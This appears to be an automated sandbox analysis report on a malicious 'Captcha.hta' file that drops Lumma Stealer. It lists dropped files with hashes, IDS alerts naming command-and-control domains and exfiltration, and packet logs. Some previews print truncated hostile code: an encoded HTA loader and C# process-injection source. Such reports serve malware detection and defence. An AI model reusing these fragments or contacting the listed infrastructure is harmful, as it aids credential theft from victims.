                                                                      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....c:\Users\user\AppData\Local\Temp\2pzvj5lc\2pzvj5lc.0.cs(8,31): error CS0626: Warning as Error: Method, operator, or accessor 'Window

                                                                      C:\Users\user\AppData\Local\Temp\RES3BAA.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Dec 12 08:24:32 2024, 1st section name ".debug$S"
                                                                      Category:dropped
                                                                      Size (bytes):1328
                                                                      Entropy (8bit):3.9819372239571758
                                                                      Encrypted:false
                                                                      SSDEEP:24:HAe9E2+fTfZrXDfHKwKEbsmfII+ycuZhN2akS+PNnqSqd:eLtzBKPmg1ul2a3iqSK
                                                                      MD5:4F1A235936F1E816D549903F107550D7
                                                                      SHA1:9590612DE33FA0DA1CAA36ED7E78223D2B3EBC0A
                                                                      SHA-256:8C81ECB0FC3D15CFD6939CE7E811127813A71E75ADFB0EAAF4F80C90358E18C4
                                                                      SHA-512:2FF49637E6CC4EC9F0C71E2CC19F46EE3B2438F56B57C1539D51E140415E2B0FECF99CD13F58028E2D7CD708E9E27EFF92B72CF2678B17F833EEC1DF4B5A8F56
                                                                      Malicious:false
                                                                      Preview:L.....Zg.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\mvgjodmb\CSC1DCFE1A1CB594C5687CEBA7BEDB98DA4.TMP................b.l.h......fr..........4.......C:\Users\user\AppData\Local\Temp\RES3BAA.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.v.g.j.o.d.m.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ora4veg.tut.ps1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f4vafq3c.sdo.psm1

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\mvgjodmb\CSC1DCFE1A1CB594C5687CEBA7BEDB98DA4.TMP

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                      File Type:MSVC .res
                                                                      Category:dropped
                                                                      Size (bytes):652
                                                                      Entropy (8bit):3.101053862247401
                                                                      Encrypted:false
                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryYak7Ynqq+PN5Dlq5J:+RI+ycuZhN2akS+PNnqX
                                                                      MD5:F862E8A16CFE68E503F3DFAAFCC06672
                                                                      SHA1:90AE4916F70ADCC930556C158A195D662090225D
                                                                      SHA-256:8286BAE78E44E507A6065DC96A55E6543B9F11F8C769A3DB46F62186DE31B69A
                                                                      SHA-512:39F17BA3F195B594E83556BAECB27B7EDE4939AEA48707B1D927E1C430CCF44DB2C1FF57FBDCD5B5E4F22C9A0C6E1B1FA77EBD9CBB6EBA7729B46761E9C5DF14
                                                                      Malicious:false
                                                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.v.g.j.o.d.m.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.v.g.j.o.d.m.b...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                      C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.0.cs

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):10583
                                                                      Entropy (8bit):4.487855797297623
                                                                      Encrypted:false
                                                                      SSDEEP:192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
                                                                      MD5:B022C6FE4494666C8337A975D175C726
                                                                      SHA1:8197D4A993E7547D19D7B067B4D28EBE48329793
                                                                      SHA-256:D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
                                                                      SHA-512:DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
                                                                      Malicious:true
                                                                      Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

                                                                      C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.cmdline

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):204
                                                                      Entropy (8bit):4.986393702798858
                                                                      Encrypted:false
                                                                      SSDEEP:6:pAu+H2L/6K2wkn23f93KzxszIwkn23f93v:p37L/6KRfcQf5
                                                                      MD5:40E45D3A59F120820C80EC3129BA45C8
                                                                      SHA1:D746B7B0A912B864642FF5FF830E39A64D608117
                                                                      SHA-256:38FBCC20202C4BB24E8A82CF42DDB755EBC606EB563011C5BC7779948748A780
                                                                      SHA-512:BD2D246A26CCDD13C339865BDBB111E2A2C322AA090A60FBA2B7422030E5146277D26EE4BEEEAF46B82007B58C5ED3DEAC4D10EA2811621BB9D21A9BDD5CADBB
                                                                      Malicious:false
                                                                      Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.0.cs"

                                                                      C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.dll

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):8704
                                                                      Entropy (8bit):4.661460379399688
                                                                      Encrypted:false
                                                                      SSDEEP:96:lbuaQZGQf9xPQ2pCa/u67hHJE9IhbpPrjzKcaEZREH0ljILHqrv5MqwTzeNc+iIK:lCaQHf9WDa/u6dRj2cafUxd5Mq6eNc1
                                                                      MD5:296317C64DDD89AA2B97B9E7F50CDC60
                                                                      SHA1:77105F276F589F6466A2F3B27495F2F48932EC73
                                                                      SHA-256:628528FB969009998893E32C20678EC4B99D6D6C05E9EDBBC3469C8EC87627CA
                                                                      SHA-512:2FC3969047FCC5F8AE30DE03F2CEA07548D22C07AEE83A02CBDD620B6C8472CC9896FC8B26FA87182BDE5B1320DF41C399A7AEAB03E5B2722B54E3A45DE91CD4
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Avira, Detection: 100%
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Zg...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......

                                                                      C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.out

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                      Category:modified
                                                                      Size (bytes):702
                                                                      Entropy (8bit):5.235845692198278
                                                                      Encrypted:false
                                                                      SSDEEP:12:KJN/qR37L/6KRfcQf8KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBqdn6KRfff8Kax5DqBVKVrdFAMBJTH
                                                                      MD5:1A7A56218AABF67B9CEFFC649DDF02BB
                                                                      SHA1:3EFB5D0134252A3E84C0CF53E381958BABB397D7
                                                                      SHA-256:AAB3CB57773403D22E6818E543738905395E334C86DD2EB585ABEA1D3A1B801E
                                                                      SHA-512:FAC1A4C1E9C133E3D752A49CDBB74D37BB3133CFE4399BD91E09ADF7D60AB76356CF8D8DC6D34A0ED04976C77C6B4E70343F6A9E532E7D88CBFFD7549B956FD1
                                                                      Malicious:false
                                                                      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\mvgjodmb\mvgjodmb.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DHDYV61PT9V1J4PWLV96.temp

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):6221
                                                                      Entropy (8bit):3.7272031940937937
                                                                      Encrypted:false
                                                                      SSDEEP:96:VNas33CxH5HkvhkvCCtHr0YdLXHYr0YdLXH5:vasyZLHr0YdLor0YdLp
                                                                      MD5:1511AD7C083001C0E8791E7D4DC475C1
                                                                      SHA1:BE804C1F7A1790C7C7A7DA3AFCEDD81DC34F8CAC
                                                                      SHA-256:D0232C6769F461799F8C920B46C9735C5FD4C3D0BB09EE4DBD98F7CD4A7A749D
                                                                      SHA-512:E9361B4040279DE5950166AB029CF7CC1CC828F1CE4F64CCAB5E3218A671E9B4572D0E5EFC91BBB3CF14DD88C35DEF5688674BFDCB6077CFC6EC1D7E72FBD338
                                                                      Malicious:false
                                                                      Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....N.TbL..o..YbL......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Yy6...........................%..A.p.p.D.a.t.a...B.V.1......Y|6..Roaming.@......CW.^.Y|6...........................zm.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`...........................W0.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):6221
                                                                      Entropy (8bit):3.7272031940937937
                                                                      Encrypted:false
                                                                      SSDEEP:96:VNas33CxH5HkvhkvCCtHr0YdLXHYr0YdLXH5:vasyZLHr0YdLor0YdLp
                                                                      MD5:1511AD7C083001C0E8791E7D4DC475C1
                                                                      SHA1:BE804C1F7A1790C7C7A7DA3AFCEDD81DC34F8CAC
                                                                      SHA-256:D0232C6769F461799F8C920B46C9735C5FD4C3D0BB09EE4DBD98F7CD4A7A749D
                                                                      SHA-512:E9361B4040279DE5950166AB029CF7CC1CC828F1CE4F64CCAB5E3218A671E9B4572D0E5EFC91BBB3CF14DD88C35DEF5688674BFDCB6077CFC6EC1D7E72FBD338
                                                                      Malicious:false
                                                                      Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v.....N.TbL..o..YbL......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Yy6...........................%..A.p.p.D.a.t.a...B.V.1......Y|6..Roaming.@......CW.^.Y|6...........................zm.R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`...........................W0.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........

                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):55
                                                                      Entropy (8bit):4.306461250274409
                                                                      Encrypted:false
                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                      Malicious:false
                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                      Static File Info

                                                                      General

                                                                      File type:HTML document, ASCII text, with very long lines (1004), with CRLF line terminators
                                                                      Entropy (8bit):3.733889945504831
                                                                      TrID:
                                                                        File name:Captcha.hta
                                                                        File size:1'047 bytes
                                                                        MD5:21bd78bbc50aa0b32d6e8d1868e9ad5e
                                                                        SHA1:8a4278d077fa472fd6e4cbde95e6a3b928eff10b
                                                                        SHA256:a5a7a72decc3a1f9bb2e0c39269f9660051a3a40c34f87789e33995b9dd2b9e1
                                                                        SHA512:3d088b7ff90f722223fe2cef2bd65b8df3fdcaa92fe14f46b8c1f2b9ee0c3c1c94cff2ca02acf9619ffa372db4565fc1b576fd553e928ebf6d94238b86eace0e
                                                                        SSDEEP:12:Sr70d76S0poWsM23WhXKREC8PJtAT+mLAsg2TpY7OVyhFSM+M2GRYAFPcR1b:q0d+2UVKR5ST5d6yGMmAWR1b
                                                                        TLSH:0B11A37C6522D4CDAD337D7BECA46B20D2189E03E8D463C4485580852FE1579B5543DA
                                                                        File Content Preview:<script language="javascript">..document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%20%20%20%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%20%20%20%20%20%20%20%20%76%61%72%20%73%68%65%6C

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-12-12T07:52:07.811536+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449734147.45.44.13180TCP
                                                                        2024-12-12T07:52:08.708627+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449734147.45.44.13180TCP
                                                                        2024-12-12T07:52:10.958689+01002057949ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)1192.168.2.4541231.1.1.153UDP
                                                                        2024-12-12T07:52:10.958689+01002057981ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz)1192.168.2.4541231.1.1.153UDP
                                                                        2024-12-12T07:52:11.188817+01002057945ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)1192.168.2.4653611.1.1.153UDP
                                                                        2024-12-12T07:52:11.188817+01002057983ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz)1192.168.2.4653611.1.1.153UDP
                                                                        2024-12-12T07:52:11.432886+01002057929ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)1192.168.2.4588361.1.1.153UDP
                                                                        2024-12-12T07:52:11.432886+01002057979ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz)1192.168.2.4588361.1.1.153UDP
                                                                        2024-12-12T07:52:11.676415+01002057931ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)1192.168.2.4606201.1.1.153UDP
                                                                        2024-12-12T07:52:11.676415+01002057977ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz)1192.168.2.4606201.1.1.153UDP
                                                                        2024-12-12T07:52:11.967953+01002057925ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)1192.168.2.4589541.1.1.153UDP
                                                                        2024-12-12T07:52:11.967953+01002057973ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz)1192.168.2.4589541.1.1.153UDP
                                                                        2024-12-12T07:52:13.534646+01002057926ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI)1192.168.2.449737172.67.206.64443TCP
                                                                        2024-12-12T07:52:13.534646+01002057974ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI)1192.168.2.449737172.67.206.64443TCP
                                                                        2024-12-12T07:52:13.534646+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737172.67.206.64443TCP
                                                                        2024-12-12T07:52:14.256631+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449737172.67.206.64443TCP
                                                                        2024-12-12T07:52:14.256631+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449737172.67.206.64443TCP
                                                                        2024-12-12T07:52:16.055149+01002057926ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI)1192.168.2.449738172.67.206.64443TCP
                                                                        2024-12-12T07:52:16.055149+01002057974ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI)1192.168.2.449738172.67.206.64443TCP
                                                                        2024-12-12T07:52:16.055149+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738172.67.206.64443TCP
                                                                        2024-12-12T07:52:16.781738+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449738172.67.206.64443TCP
                                                                        2024-12-12T07:52:16.781738+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449738172.67.206.64443TCP
                                                                        2024-12-12T07:52:18.227210+01002057926ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI)1192.168.2.449739172.67.206.64443TCP
                                                                        2024-12-12T07:52:18.227210+01002057974ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI)1192.168.2.449739172.67.206.64443TCP
                                                                        2024-12-12T07:52:18.227210+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739172.67.206.64443TCP
                                                                        2024-12-12T07:52:19.083711+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449739172.67.206.64443TCP
                                                                        2024-12-12T07:52:20.349759+01002057926ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI)1192.168.2.449740172.67.206.64443TCP
                                                                        2024-12-12T07:52:20.349759+01002057974ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI)1192.168.2.449740172.67.206.64443TCP
                                                                        2024-12-12T07:52:20.349759+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740172.67.206.64443TCP
                                                                        2024-12-12T07:52:22.415356+01002057926ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI)1192.168.2.449742172.67.206.64443TCP
                                                                        2024-12-12T07:52:22.415356+01002057974ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI)1192.168.2.449742172.67.206.64443TCP
                                                                        2024-12-12T07:52:22.415356+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742172.67.206.64443TCP
                                                                        2024-12-12T07:52:25.613617+01002057926ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI)1192.168.2.449746172.67.206.64443TCP
                                                                        2024-12-12T07:52:25.613617+01002057974ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI)1192.168.2.449746172.67.206.64443TCP
                                                                        2024-12-12T07:52:25.613617+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449746172.67.206.64443TCP
                                                                        2024-12-12T07:52:28.579229+01002057926ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI)1192.168.2.449748172.67.206.64443TCP
                                                                        2024-12-12T07:52:28.579229+01002057974ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI)1192.168.2.449748172.67.206.64443TCP
                                                                        2024-12-12T07:52:28.579229+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449748172.67.206.64443TCP
                                                                        2024-12-12T07:52:28.593209+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449748172.67.206.64443TCP
                                                                        2024-12-12T07:52:33.452236+01002057926ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI)1192.168.2.449750172.67.206.64443TCP
                                                                        2024-12-12T07:52:33.452236+01002057974ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI)1192.168.2.449750172.67.206.64443TCP
                                                                        2024-12-12T07:52:33.452236+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449750172.67.206.64443TCP
                                                                        2024-12-12T07:52:34.269240+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449750172.67.206.64443TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 12, 2024 07:52:04.103553057 CET4973280192.168.2.445.131.135.227
                                                                        Dec 12, 2024 07:52:04.222999096 CET804973245.131.135.227192.168.2.4
                                                                        Dec 12, 2024 07:52:04.223155975 CET4973280192.168.2.445.131.135.227
                                                                        Dec 12, 2024 07:52:04.226413965 CET4973280192.168.2.445.131.135.227
                                                                        Dec 12, 2024 07:52:04.345954895 CET804973245.131.135.227192.168.2.4
                                                                        Dec 12, 2024 07:52:05.471096992 CET804973245.131.135.227192.168.2.4
                                                                        Dec 12, 2024 07:52:05.471191883 CET804973245.131.135.227192.168.2.4
                                                                        Dec 12, 2024 07:52:05.471271992 CET4973280192.168.2.445.131.135.227
                                                                        Dec 12, 2024 07:52:05.707577944 CET804973245.131.135.227192.168.2.4
                                                                        Dec 12, 2024 07:52:05.759459972 CET4973280192.168.2.445.131.135.227
                                                                        Dec 12, 2024 07:52:06.421961069 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:06.541516066 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:06.541675091 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:06.541960001 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:06.661348104 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:07.811290026 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:07.811446905 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:07.811464071 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:07.811536074 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:07.812125921 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:07.812143087 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:07.812225103 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:07.812849045 CET8049734147.45.44.131192.168.2.4
